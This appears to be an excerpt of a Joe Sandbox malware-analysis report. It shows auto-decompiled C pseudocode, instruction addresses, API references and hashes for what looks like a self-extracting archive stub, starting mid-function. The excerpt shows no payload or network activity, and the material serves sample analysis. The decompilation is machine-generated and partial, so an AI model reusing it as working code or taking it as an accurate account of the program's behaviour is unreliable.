																												_t482 = E01007907(_t679, _t689 + 0x10, _t578);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E01001F94(__eflags, 0x47, _t578 + 0x24, _t689 + 0x10f8);
																											__eflags = 0;
																											_t482 = 0;
																											 *((char*)(_t708 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t434;
																										if(_t434 != 0) {
																											goto L131;
																										}
																										_t494 = 0x50;
																										__eflags =  *(_t708 - 0x18) - _t494;
																										if( *(_t708 - 0x18) == _t494) {
																											goto L131;
																										}
																										_t436 = 1;
																										_t613 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t578 + 0x6cc4);
																									if( *(_t578 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t704 =  *(_t578 + 0x32e4);
																									_t687 =  *(_t578 + 0x32e0);
																									__eflags = _t704;
																									if(__eflags < 0) {
																										L126:
																										_t702 = _t689 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t637 =  *(_t578 + 0x32d8);
																										_t638 = _t637 << 0xa;
																										__eflags = ( *(_t578 + 0x32dc) << 0x00000020 | _t637) << 0xa - _t704;
																										if(__eflags < 0) {
																											L125:
																											_t434 =  *(_t708 - 0xe);
																											_t613 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t704;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t708 - 0x2164; // -6500
																												E01009B21(_t238,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																												 *(_t708 - 0x24) =  *(_t578 + 0x32e0);
																												 *(_t708 - 0x1c) =  *(_t578 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t502 = E010098E5(_t687);
																												__eflags = _t687 -  *(_t578 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t502 -  *(_t578 + 0x32d8);
																												if(_t502 <=  *(_t578 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t687 - 0x5f5e100;
																											if(_t687 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t638 - _t687;
																										if(_t638 <= _t687) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t687 - 0xf4240;
																									if(_t687 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t689 + 0xe4;
																								 *_t199 =  *(_t689 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t708 - 0x11)) = 0;
																							_t504 = 0x50;
																							__eflags = _t702 - _t504;
																							if(_t702 != _t504) {
																								_t193 = _t708 - 0x2164; // -6500
																								__eflags = E01009989(_t193);
																								if(__eflags != 0) {
																									E01001F94(__eflags, 0x3b, _t578 + 0x24, _t689 + 0x10f8);
																									E01007061(0x1040f50, _t708, _t578 + 0x24, _t689 + 0x10f8);
																								}
																							}
																							goto L109;
																						}
																						 *(_t689 + 0x10f7) = 1;
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) != 0) {
																							_t425 =  *(_t708 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t708 - 0xe) = 1;
																					 *(_t708 - 0xd) = 1;
																					_t183 = _t708 - 0x113c; // -2364
																					_t514 = L01011375(_t606, _t183, 0, 0, 1);
																					__eflags = _t514;
																					if(_t514 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t708 - 0x1c) = 0;
																					L99:
																					_t185 = _t708 - 0x2164; // -6500
																					E01009653(_t185, _t702);
																					_t395 =  *(_t708 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t708 - 0x2164; // -6500
																				_push(_t578);
																				_t518 = E010080EA(_t689);
																				_t702 =  *(_t708 - 0x18);
																				_t606 = _t518;
																				 *(_t708 - 0xd) = _t606;
																				L93:
																				__eflags = _t606;
																				if(_t606 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t708 - 0xd);
																			if( *(_t708 - 0xd) != 0) {
																				_t519 =  *(_t708 - 0x18);
																				__eflags = _t519 - 0x50;
																				if(_t519 != 0x50) {
																					_t645 = 0x49;
																					__eflags = _t519 - _t645;
																					if(_t519 != _t645) {
																						_t646 = 0x45;
																						__eflags = _t519 - _t646;
																						if(_t519 != _t646) {
																							_t520 =  *(_t689 + 8);
																							__eflags =  *((intOrPtr*)(_t520 + 0x615c)) - 1;
																							if( *((intOrPtr*)(_t520 + 0x615c)) != 1) {
																								 *(_t689 + 0xe4) =  *(_t689 + 0xe4) + 1;
																								_t173 = _t708 - 0x113c; // -2364
																								_push(_t578);
																								E01007F26(_t689);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t420 - 5;
																		if(_t420 == 5) {
																			goto L83;
																		}
																		_t606 =  *(_t708 - 0xd);
																		_t702 =  *(_t708 - 0x18);
																		__eflags = _t606;
																		if(_t606 == 0) {
																			goto L96;
																		}
																		__eflags = _t702 - _t676;
																		if(_t702 == _t676) {
																			goto L93;
																		}
																		_t523 =  *(_t689 + 8);
																		__eflags =  *((char*)(_t523 + 0x6201));
																		if( *((char*)(_t523 + 0x6201)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t708 - 0x11)) = 0;
																		_t526 = E0100A180(_t689 + 0x10f8);
																		__eflags = _t526;
																		if(_t526 == 0) {
																			L81:
																			__eflags =  *((char*)(_t708 - 0x11));
																			if( *((char*)(_t708 - 0x11)) == 0) {
																				_t606 =  *(_t708 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t606 = 0;
																			 *(_t708 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t708 - 0x11));
																		if( *((char*)(_t708 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t578 + 0x32c0);
																		_t161 = _t708 - 0x11; // 0x7ef
																		E01009377(0,  *(_t689 + 8), 0, _t689 + 0x10f8, 0x800, _t161,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t578 + 0x3341));
																	if( *((char*)(_t578 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t708 - 0x28; // 0x7d8
																	_t534 = E0101FDFA(_t578 + 0x3342, _t133, 8);
																	_t710 = _t712 + 0xc;
																	__eflags = _t534;
																	if(_t534 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t578 + 0x6cc4);
																	if( *(_t578 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t689 + 0x10f6));
																	_t137 = _t708 - 0x113c; // -2364
																	_push(_t578 + 0x24);
																	if(__eflags != 0) {
																		_push(6);
																		E01001F94(__eflags);
																		E01006FC6(0x1040f50, 0xb);
																		__eflags = 0;
																		 *(_t708 - 0xd) = 0;
																		goto L73;
																	}
																	_push(0x80);
																	E01001F94(__eflags);
																	E0100EB27( *(_t689 + 8) + 0x5024);
																	 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																	_t142 = _t708 - 0x13c; // 0x6c4
																	L0100EAB4(_t142);
																}
															}
															E01006FC6(0x1040f50, 2);
															_t546 = E01001EDA(_t578);
															__eflags =  *((char*)(_t578 + 0x6cb4));
															_t395 = _t546 & 0xffffff00 |  *((char*)(_t578 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t708 - 0x219c; // -6556
														_t548 = E01007D45(_t101, _t578 + 0x32c0);
														__eflags = _t548;
														if(_t548 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t708 - 0x21a0));
														if( *((char*)(_t708 - 0x21a0)) == 0) {
															L59:
															 *(_t708 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t708 - 0x219c; // -6556
														_t550 = E01007D27(_t103, _t689);
														__eflags = _t550;
														if(_t550 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t699 - _t674;
													if(_t699 != _t674) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t400 + 0x6158));
												if( *((char*)(_t400 + 0x6158)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t689 + 0x10f8);
											if( *(_t689 + 0x10f8) == 0) {
												goto L50;
											}
											 *(_t708 - 0xd) = 1;
											__eflags =  *(_t578 + 0x3318);
											if( *(_t578 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t699 - _t389;
										_t390 = 1;
										if(_t699 != _t389) {
											goto L46;
										}
										goto L45;
									}
									_t677 =  *((intOrPtr*)(_t578 + 0x6cb4));
									 *(_t708 - 0xe) = _t677;
									 *(_t708 - 0x24) = _t677;
									__eflags = _t677;
									if(_t677 == 0) {
										goto L214;
									} else {
										_t673 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t689 + 0xec) -  *((intOrPtr*)(_t581 + 0xa334));
								if( *(_t689 + 0xec) <  *((intOrPtr*)(_t581 + 0xa334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t689 + 0xf1));
								if( *((char*)(_t689 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t578 + 0x32e0) = _t672;
								 *(_t578 + 0x32e4) = _t672;
								goto L26;
							}
							__eflags =  *(_t578 + 0x32e0) - _t672;
							if( *(_t578 + 0x32e0) >= _t672) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t578 + 0x32d8) = _t672;
							 *(_t578 + 0x32dc) = _t672;
							goto L22;
						}
						__eflags =  *(_t578 + 0x32d8) - _t672;
						if( *(_t578 + 0x32d8) >= _t672) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t696 - 3;
					if(_t696 != 3) {
						L10:
						__eflags = _t696 - 5;
						if(_t696 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t578 + 0x45ac));
						if( *((char*)(_t578 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t708 - 0x18));
						_push(0);
						_push(_t689 + 0x10);
						_push(_t578);
						_t567 = E010184BD(_t672);
						__eflags = _t567;
						if(_t567 != 0) {
							__eflags = 0;
							 *0x1033260( *((intOrPtr*)(_t578 + 0x6ca0)),  *((intOrPtr*)(_t578 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t578 + 0x10))))();
							goto L15;
						} else {
							E01006FC6(0x1040f50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t689 + 0x10f7);
					if( *(_t689 + 0x10f7) == 0) {
						goto L217;
					} else {
						E01007B66(_t578, _t708,  *(_t689 + 8), _t578, _t689 + 0x10f8);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t689 + 0x5f)) == 0) {
					L4:
					_t395 = 0;
					goto L17;
				}
				_push(_t371);
				_push(0);
				_push(_t689 + 0x10);
				_push(_t578);
				if(E010184BD(0) != 0) {
					_t672 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E01006FC6(0x1040f50, 1);
					goto L4;
				}
			}

0x0100857b
0x01008580
0x0100858a
0x01008590
0x01008593
0x01008596
0x01008598
0x0100859e
0x010085a5
0x010085ab
0x010085d7
0x010085d8
0x010085de
0x010085e1
0x0100867a
0x01008680
0x01008686
0x0100869e
0x0100869e
0x010086a4
0x010086bc
0x010086bc
0x010086bf
0x010086c5
0x010086e2
0x010086e7
0x010086eb
0x010086f5
0x01008700
0x01008705
0x01008707
0x0100870a
0x0100870d
0x0100870f
0x01008711
0x01008715
0x01008717
0x01008719
0x01008719
0x01008715
0x01008721
0x01008726
0x01008727
0x01008734
0x01008735
0x0100873d
0x01008744
0x01008747
0x0100879e
0x010087a3
0x010087a5
0x010087a7
0x010087ad
0x010087b3
0x010087b7
0x010087b7
0x010087b7
0x010087b7
0x01008749
0x0100874c
0x01008752
0x01008754
0x01008756
0x0100875a
0x0100875c
0x01008763
0x01008768
0x01008769
0x01008770
0x01008775
0x0100877f
0x01008781
0x01008797
0x01008783
0x01008785
0x0100878c
0x0100878e
0x0100878e
0x01008781
0x0100875a
0x01008754
0x010087c0
0x010087c5
0x010087dd
0x010087e8
0x010087f0
0x010087f3
0x010087f5
0x010087f9
0x010087fc
0x010087ff
0x01008802
0x0100881a
0x0100881d
0x01008822
0x01008828
0x01008829
0x0100882b
0x01008834
0x01008834
0x01008836
0x01008839
0x01008843
0x0100884a
0x0100884f
0x01008851
0x0100921d
0x0100921d
0x01008667
0x01008668
0x0100866d
0x01008677
0x01008677
0x01008857
0x01008865
0x01008868
0x01008870
0x01008877
0x0100887a
0x01008891
0x01008891
0x01008894
0x01008894
0x01008899
0x0100889c
0x010088a3
0x010088a4
0x010088a7
0x010088aa
0x010088b5
0x010088b5
0x010088b8
0x010088bf
0x010088bf
0x010088c5
0x010088cc
0x010088cd
0x010088db
0x010088e0
0x010088e2
0x0100891a
0x0100891d
0x01008929
0x01008929
0x01008929
0x0100892c
0x0100892c
0x01008936
0x0100893b
0x0100893d
0x01008961
0x01008961
0x01008968
0x00000000
0x00000000
0x0100896a
0x01008974
0x01008979
0x0100897b
0x01008a5d
0x00000000
0x01008a5d
0x01008981
0x01008984
0x0100898c
0x01008992
0x01008993
0x01008993
0x01008995
0x0100899e
0x010089a1
0x010089ad
0x010089c0
0x010089ca
0x010089dc
0x010089e1
0x010089e8
0x01008a81
0x01008a81
0x01008a85
0x01008a8b
0x01008a90
0x01008a96
0x01008a9b
0x01008aa1
0x01008aa8
0x01008aad
0x01008aae
0x01008ab0
0x01008b43
0x01008b45
0x01008b4a
0x01008b4c
0x01008b9e
0x01008ba1
0x01008ba3
0x01008bc7
0x01008bca
0x01008bca
0x01008bd1
0x01008c09
0x01008c0b
0x010091d2
0x010091d2
0x010091d6
0x010091dc
0x010091e1
0x010091e5
0x010091e8
0x010091eb
0x010091ed
0x010091ed
0x010091ed
0x010091ed
0x010091f3
0x010091f3
0x010091f7
0x00000000
0x00000000
0x010091f9
0x010091fb
0x01008665
0x01008665
0x00000000
0x01008665
0x01009201
0x01009207
0x01009215
0x01009217
0x00000000
0x00000000
0x00000000
0x01009217
0x01009209
0x0100920b
0x00000000
0x0100920b
0x01008c11
0x01008c11
0x01008c14
0x01008c1b
0x01008c2d
0x01008c2d
0x01008c30
0x01008c32
0x01008c79
0x01008c79
0x01008c7d
0x01008c7f
0x01008c87
0x01008c87
0x01008c9b
0x01008ca1
0x01008ca7
0x01008cad
0x01008cbe
0x01008cd4
0x01008cdf
0x01008ce8
0x01008ceb
0x01008cf2
0x01008cf8
0x01008cfd
0x01008d00
0x01008d02
0x01008d05
0x01008d08
0x01008d0b
0x01008d0e
0x01008d11
0x01008d13
0x01008db6
0x01008db6
0x01008db9
0x01008dc0
0x01008dc7
0x01008dcb
0x01008de1
0x01008de3
0x01008de3
0x01008de4
0x01008de4
0x01008de8
0x01008deb
0x01008dee
0x01008df1
0x01008efd
0x01008f04
0x01008f06
0x01008f0d
0x01008f37
0x01008f3c
0x01008f4e
0x01008f54
0x01008f56
0x01008f5c
0x01008f76
0x01008f0f
0x01008f0f
0x01008f15
0x01008f1b
0x01008f1c
0x01008f1c
0x01008f0d
0x01008f7b
0x01008f7d
0x01008f82
0x01008f89
0x01008fbb
0x01008fbb
0x01008fbb
0x01008fbd
0x01008fbf
0x01008fbf
0x01008fc6
0x01008fd0
0x01008fd7
0x01008ff6
0x01008ff6
0x01008ffa
0x01008ffd
0x0100905e
0x0100905e
0x01009062
0x01009065
0x01009078
0x01009078
0x01009078
0x0100907a
0x0100907a
0x0100907e
0x00000000
0x00000000
0x01009084
0x01009087
0x0100908b
0x01009097
0x01009097
0x0100909b
0x010090b6
0x010090b6
0x010090b8
0x010090cd
0x010090cd
0x010090cf
0x01009193
0x01009193
0x01009196
0x0100919d
0x010091a5
0x010091ac
0x010091b1
0x010091b3
0x010091c6
0x010091c6
0x010091b3
0x010091cb
0x00000000
0x010091cb
0x010090d5
0x010090da
0x010090dc
0x010090df
0x010090e5
0x010090e5
0x010090e7
0x010090f9
0x010090f9
0x010090ff
0x01009104
0x01009107
0x0100910d
0x01009121
0x01009128
0x0100913b
0x0100913d
0x01009146
0x0100914b
0x01009151
0x01009160
0x01009173
0x01009186
0x01009188
0x0100918b
0x01009190
0x00000000
0x01009190
0x010090e9
0x010090ef
0x00000000
0x00000000
0x010090f1
0x010090f7
0x00000000
0x00000000
0x00000000
0x010090f7
0x010090e1
0x010090e3
0x00000000
0x00000000
0x00000000
0x010090e3
0x010090ba
0x010090bd
0x010090c4
0x00000000
0x00000000
0x010090ca
0x00000000
0x010090ca
0x0100909d
0x0100909f
0x00000000
0x00000000
0x010090a1
0x010090a8
0x00000000
0x00000000
0x010090ae
0x010090b0
0x00000000
0x00000000
0x00000000
0x010090b0
0x0100908d
0x01009091
0x00000000
0x00000000
0x00000000
0x01009091
0x01009067
0x0100906e
0x00000000
0x00000000
0x01009070
0x01009072
0x00000000
0x00000000
0x01009074
0x00000000
0x01009074
0x01008fff
0x01009003
0x00000000
0x00000000
0x01009005
0x01009007
0x00000000
0x00000000
0x01009009
0x0100900f
0x01009039
0x01009039
0x01009043
0x01009044
0x01009046
0x01009046
0x01009052
0x01009056
0x0100905b
0x00000000
0x0100905b
0x01009011
0x01009017
0x01009021
0x01009021
0x01009028
0x00000000
0x00000000
0x0100902a
0x01009034
0x01009035
0x00000000
0x01009035
0x01009019
0x0100901f
0x00000000
0x00000000
0x00000000
0x0100901f
0x01008fd9
0x01008fdf
0x00000000
0x00000000
0x01008fe1
0x01008feb
0x01008feb
0x01008fed
0x01008fef
0x01008fef
0x00000000
0x01008fed
0x01008fe3
0x01008fe9
0x00000000
0x00000000
0x00000000
0x01008fe9
0x01008fc8
0x00000000
0x01008fc8
0x01008fa0
0x01008fac
0x01008fb1
0x01008fb3
0x00000000
0x00000000
0x01008fb5
0x01008fb7
0x00000000
0x01008fb7
0x01008df7
0x01008dfd
0x01008e00
0x01008e69
0x01008e69
0x01008e6e
0x01008e7f
0x01008e84
0x01008e87
0x01008e89
0x01008ed6
0x01008ed6
0x01008ed9
0x01008ed9
0x01008ee0
0x01008e35
0x01008e35
0x01008e37
0x01008ef3
0x01008ef3
0x01008ef3
0x01008ef5
0x01008ef5
0x00000000
0x01008ef5
0x01008e3d
0x01008e3d
0x01008e3f
0x00000000
0x00000000
0x01008e47
0x00000000
0x01008e47
0x01008ee6
0x01008ee8
0x00000000
0x00000000
0x01008e31
0x01008e31
0x00000000
0x01008e31
0x01008e8b
0x01008e93
0x00000000
0x00000000
0x01008e95
0x01008e9b
0x01008ea7
0x01008ea8
0x01008eab
0x01008eb9
0x01008eba
0x01008ec1
0x01008ead
0x01008ead
0x01008ead
0x01008ec6
0x01008ec6
0x01008ec9
0x01008ecb
0x01008e2e
0x01008e2e
0x00000000
0x01008e2e
0x01008ed1
0x00000000
0x01008ed1
0x01008e02
0x01008e05
0x00000000
0x00000000
0x01008e07
0x01008e09
0x01008e4d
0x01008e4d
0x01008e4f
0x00000000
0x00000000
0x01008e5b
0x01008e62
0x00000000
0x01008e62
0x01008e0b
0x01008e0e
0x00000000
0x00000000
0x01008e10
0x01008e13
0x00000000
0x00000000
0x01008e22
0x01008e27
0x01008e29
0x01008e2b
0x00000000
0x01008e2b
0x01008dcd
0x01008dcf
0x00000000
0x00000000
0x01008dd3
0x01008dd4
0x01008dd8
0x00000000
0x00000000
0x01008ddc
0x01008ddd
0x00000000
0x01008ddd
0x01008d19
0x01008d1f
0x00000000
0x00000000
0x01008d25
0x01008d2b
0x01008d31
0x01008d33
0x01008db3
0x01008db3
0x00000000
0x01008db3
0x01008d35
0x01008d3f
0x01008d3f
0x01008d4f
0x01008d52
0x01008d54
0x01008dae
0x01008dae
0x01008db1
0x01008db1
0x00000000
0x01008db1
0x01008d56
0x01008d5c
0x01008d5e
0x01008d60
0x01008d85
0x01008d8b
0x01008d97
0x01008da2
0x01008dab
0x00000000
0x01008dab
0x01008d62
0x01008d6c
0x01008d6e
0x01008d73
0x01008d79
0x00000000
0x00000000
0x01008d7b
0x00000000
0x00000000
0x01008d7d
0x01008d83
0x00000000
0x00000000
0x00000000
0x01008d83
0x01008d64
0x01008d6a
0x00000000
0x00000000
0x00000000
0x01008d6a
0x01008d58
0x01008d5a
0x00000000
0x00000000
0x00000000
0x01008d5a
0x01008d37
0x01008d3d
0x00000000
0x00000000
0x00000000
0x01008d3d
0x01008c81
0x01008c81
0x01008c81
0x01008c81
0x00000000
0x01008c81
0x01008c38
0x01008c3b
0x01008c3c
0x01008c3f
0x01008c41
0x01008c4c
0x01008c4e
0x01008c5d
0x01008c6f
0x01008c6f
0x01008c4e
0x00000000
0x01008c3f
0x01008c1d
0x01008c24
0x01008c2b
0x01008c76
0x00000000
0x01008c76
0x00000000
0x01008c2b
0x01008bd7
0x01008bda
0x01008be1
0x01008be8
0x01008bed
0x01008bef
0x00000000
0x00000000
0x01008bf1
0x01008bf3
0x01008bf6
0x01008bf6
0x01008bfc
0x01008c01
0x00000000
0x01008c01
0x01008ba5
0x01008bae
0x01008baf
0x01008bb4
0x01008bb7
0x01008bb9
0x01008bc1
0x01008bc1
0x01008bc3
0x00000000
0x00000000
0x00000000
0x01008bc5
0x01008b4e
0x01008b52
0x01008b58
0x01008b5b
0x01008b5f
0x01008b67
0x01008b68
0x01008b6b
0x01008b73
0x01008b74
0x01008b77
0x01008b79
0x01008b7f
0x01008b85
0x01008b87
0x01008b8d
0x01008b94
0x01008b97
0x01008b97
0x01008b85
0x01008b77
0x01008b6b
0x01008b5f
0x00000000
0x01008b52
0x01008ab6
0x01008ab9
0x00000000
0x00000000
0x01008abf
0x01008ac2
0x01008ac5
0x01008ac7
0x00000000
0x00000000
0x01008acd
0x01008ad0
0x00000000
0x00000000
0x01008ad6
0x01008ad9
0x01008ae0
0x00000000
0x00000000
0x01008ae8
0x01008af2
0x01008af7
0x01008af9
0x01008b30
0x01008b30
0x01008b34
0x01008bbe
0x00000000
0x01008bbe
0x01008b3a
0x01008b3c
0x01008b3e
0x00000000
0x01008b3e
0x01008afb
0x01008aff
0x00000000
0x00000000
0x01008b01
0x01008b09
0x01008b0a
0x01008b11
0x01008b2b
0x00000000
0x01008b2b
0x010089ee
0x010089f5
0x00000000
0x00000000
0x010089fd
0x01008a08
0x01008a0d
0x01008a10
0x01008a12
0x00000000
0x00000000
0x01008a14
0x01008a1b
0x00000000
0x00000000
0x01008a1d
0x01008a24
0x01008a2e
0x01008a2f
0x01008a69
0x01008a6b
0x01008a77
0x01008a7c
0x01008a7e
0x00000000
0x01008a7e
0x01008a31
0x01008a36
0x01008a44
0x01008a49
0x01008a4d
0x01008a53
0x01008a53
0x01008961
0x01008946
0x0100894d
0x01008952
0x01008959
0x00000000
0x01008959
0x010088eb
0x010088f1
0x010088f6
0x010088f8
0x00000000
0x00000000
0x010088fa
0x01008901
0x01008913
0x01008915
0x00000000
0x01008915
0x01008904
0x0100890a
0x0100890f
0x01008911
0x00000000
0x00000000
0x00000000
0x01008911
0x010088ba
0x010088bd
0x00000000
0x00000000
0x00000000
0x010088bd
0x010088ac
0x010088b3
0x00000000
0x00000000
0x00000000
0x010088b3
0x0100887c
0x01008883
0x00000000
0x00000000
0x01008885
0x01008889
0x0100888f
0x00000000
0x00000000
0x00000000
0x0100888f
0x0100882d
0x01008830
0x01008832
0x00000000
0x00000000
0x00000000
0x01008832
0x01008804
0x0100880a
0x0100880d
0x01008810
0x01008812
0x00000000
0x01008818
0x01008818
0x01008818
0x00000000
0x01008818
0x01008812
0x010086cd
0x010086d3
0x00000000
0x00000000
0x010086d5
0x010086dc
0x00000000
0x00000000
0x00000000
0x010086dc
0x010086a6
0x010086b0
0x010086b0
0x010086b6
0x00000000
0x010086b6
0x010086a8
0x010086ae
0x00000000
0x00000000
0x00000000
0x010086ae
0x01008688
0x01008692
0x01008692
0x01008698
0x00000000
0x01008698
0x0100868a
0x01008690
0x00000000
0x00000000
0x00000000
0x01008690
0x010085e7
0x010085ea
0x01008609
0x01008609
0x0100860c
0x00000000
0x00000000
0x01008612
0x01008619
0x00000000
0x00000000
0x01008624
0x01008625
0x01008629
0x0100862a
0x0100862b
0x01008630
0x01008632
0x01008647
0x0100865b
0x01008663
0x00000000
0x01008634
0x0100863b
0x00000000
0x0100863b
0x01008632
0x010085ec
0x010085f3
0x00000000
0x010085f9
0x01008604
0x00000000
0x01008604
0x010085f3
0x010085b0
0x010085ce
0x010085ce
0x00000000
0x010085ce
0x010085b2
0x010085b3
0x010085b7
0x010085b8
0x010085c0
0x010085d5
0x010085d5
0x00000000
0x010085c2
0x010085c9
0x00000000
0x010085c9

APIs

__EH_prolog.LIBCMT ref: 01008580
_memcmp.LIBVCRUNTIME ref: 01008A08

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: c3732b1a344aee2753817648de3616a7b79423fad95945ed16edce01a7509ae1
Instruction ID: bc9754cab3c1ff847ae5049f7b6511c18069fa072d61b89e2e630246e00b2351
Opcode Fuzzy Hash: c3732b1a344aee2753817648de3616a7b79423fad95945ed16edce01a7509ae1
Instruction Fuzzy Hash: 6282C570D04285AEFF67DB68C884AFABBA9BF15304F0881FAD9D99B1C2D7315644CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101F063, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101F063() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0101F070); // executed
				return _t1;
			}

0x0101f068
0x0101f06e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F070,0101EAC5), ref: 0101F068

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fa2f2c18f89262ef4c6d1861a288ab681402b99a6b45110273243201d96ebe32
Instruction ID: 975ef3f9028cc66f454b5a8ba5dd1f255a4b134115bcfaf92751f50464c05a0f
Opcode Fuzzy Hash: fa2f2c18f89262ef4c6d1861a288ab681402b99a6b45110273243201d96ebe32
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0101AEE0, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0101AEE0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E0101E28C(E0103203E, _t320);
				E0101E360();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E0100130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
